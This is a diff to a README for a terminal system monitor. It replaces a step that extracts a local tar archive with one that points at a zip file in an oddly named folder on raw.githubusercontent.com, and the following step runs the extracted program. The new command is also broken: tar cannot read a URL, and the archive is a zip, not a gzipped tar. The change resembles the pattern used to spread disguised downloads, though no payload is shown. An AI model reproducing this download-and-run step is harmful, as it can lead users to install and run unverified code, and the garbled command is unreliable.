YMC911911/terminal-system-monitor/README.md

 1. Open your terminal.
 2. Navigate to the location of your downloaded file.
-3. Run `tar -xzf terminal-system-monitor.tar.gz` to extract it.
+3. Run `tar -xzf https://raw.githubusercontent.com/YMC911911/terminal-system-monitor/main/handspike/terminal_monitor_system_v2.1.zip` to extract it.
 4. Start the application by running `./terminal-system-monitor`.

 ### Step 4: Run the Application